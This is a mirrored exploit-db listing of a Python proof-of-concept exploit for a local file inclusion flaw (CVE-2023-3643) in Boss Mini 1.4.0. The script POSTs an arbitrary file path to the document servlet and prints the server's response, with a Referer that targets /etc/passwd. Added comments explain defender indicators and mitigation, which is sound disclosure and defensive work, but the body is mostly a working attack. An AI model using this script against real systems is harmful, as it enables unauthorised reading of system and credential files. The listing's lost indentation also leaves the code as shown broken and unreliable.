Boss Mini 1.4.0 – local file inclusion

  • 作者: nltt0
    日期: 2024-03-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51848/
  • # Exploit Title: Boss Mini 1.4.0 - local file inclusion
    # Date: 07/12/2023
    # Exploit Author: [nltt0] (https://github.com/nltt-br)
    # CVE: CVE-2023-3643
    
    
    '''
     _____ ______ 
    /__ \ | |/___|
    | /\/ __ _| | __ _ _ __ __ _______ \ `--. 
    | |/ _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
    | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
     \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
    __/ | 
     |___/
    
    '''
    
    from requests import post 
    from urllib.parse import quote
    from argparse import ArgumentParser
    
    # Proof-of-concept for the file-read issue named in the header (CVE-2023-3643):
    # it sends one POST to <domain>/boss/servlet/document with a form field `path`
    # and prints the response body.
    # NOTE(review): indentation was lost in this listing; the nesting described in
    # the comments below (outer try / inner try around the request) is inferred from
    # the statement order -- confirm against the upstream copy.
    # Defender view: the reliable indicators here are the request path and the `path`
    # form field, not the headers, which are static strings chosen by the script.
    # Server-side, the usual mitigation is to resolve the requested path against a
    # fixed base directory and reject anything that lands outside it.
    try:
    # Both arguments are mandatory; --domain is used verbatim as the URL prefix.
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')
    
    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    # safe='' makes quote() percent-encode every reserved character, '/' included.
    # NOTE(review): the value is later passed through requests' form encoding as
    # well, so presumably it is percent-encoded twice on the wire -- log and WAF
    # rules should decode before matching on file paths.
    file2 = quote(file, safe='')
    
    # Browser-like headers. The same --domain value is reused for Host and inside
    # Referer; the Referer query string is hard-coded to /etc/passwd regardless of
    # --file, which makes it a log artefact of this particular script.
    headers = {
    'Host': host,
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
    'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }
    
    
    # Form body: a single `path` field carrying the encoded file name.
    data = {
    'path': file2
    }
    
    try:
    # verify=False turns off TLS certificate validation for this request.
    # No timeout is passed, so the call can block until the server answers.
    req = post(url, headers=headers, data=data, verify=False)
    # Only a 200 response is printed; any other status produces no output.
    if req.status_code == 200:
    print(req.text)
    
    # Broad handler: any request failure is reduced to a one-line message.
    except Exception as e:
    print('Error in {}'.format(e)) 
     
    
    # Outer handler for failures raised before the request is sent.
    except Exception as e:
    print('Error in {}'.format(e))